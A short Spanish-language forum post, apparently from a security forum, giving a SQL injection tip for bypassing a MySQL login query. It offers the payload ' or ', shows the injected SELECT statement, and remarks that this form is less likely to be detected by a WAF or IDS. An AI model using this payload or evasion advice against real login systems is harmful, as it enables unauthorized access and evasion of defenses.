Si la BD es MySQL, el -- no funciona, se tiene que usar -- -
entonces lo mas pratico seria
' or '
que queda asi:
SELECT * FROM usuarios WHERE usuario='' or '' AND clave='' or ''
Tambien es menos probable que lo detecte un WAF/IDS.
|
|||
| Tema destacado: También estamos presentes en BlueSky |
|
|||||||||||||||||||||||||||||||||||||||||||
|